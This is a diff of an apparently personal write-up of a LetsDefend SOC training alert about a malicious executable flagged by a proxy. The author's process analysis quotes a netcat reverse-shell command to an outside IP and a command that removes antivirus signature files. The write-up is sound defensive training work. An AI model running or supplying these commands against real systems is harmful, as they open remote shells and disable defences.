topsoftrees/Homelabs/LetsDefend/SOC119 - Proxy - Malicious Executable File Detected.md

 - 13.06.2021 16:23:15 - 172.16.20.4
 - 13.06.2021 16:23:19 - 172.16.20.6

-The only processes that appear to be suspicious doesn't have a date.
+The only processes that appear to be suspicious don't have a date.
 - nc 101.32.223.119 1234 -e /bin/sh - transfers the bash code to detected malicious Hong Kong domain using netcat.
 - rm -f /var/lib/clamav-unofficial-sigs/pid/clamav-unofficial-sigs.pid - looks like Linux AV and it's signatures were removed.
 - A SQL database was accessed.

 ![Screenshot 2023-02-17 at 9 19 59 AM](https://user-images.githubusercontent.com/74877876/219680134-b389f0b0-a18e-4d99-8e36-c26cba644f3a.png)

+The other processes, I don't find suspicious.
+They pulled another operating system and run it on VMware on the device.
+The processes I find suspicious I'm going to determine as malicious but the other processes aren't.

 The host machine is an Ubuntu machine so we know it's not an executable file that was accessed, but we're going to continue to analyze the file.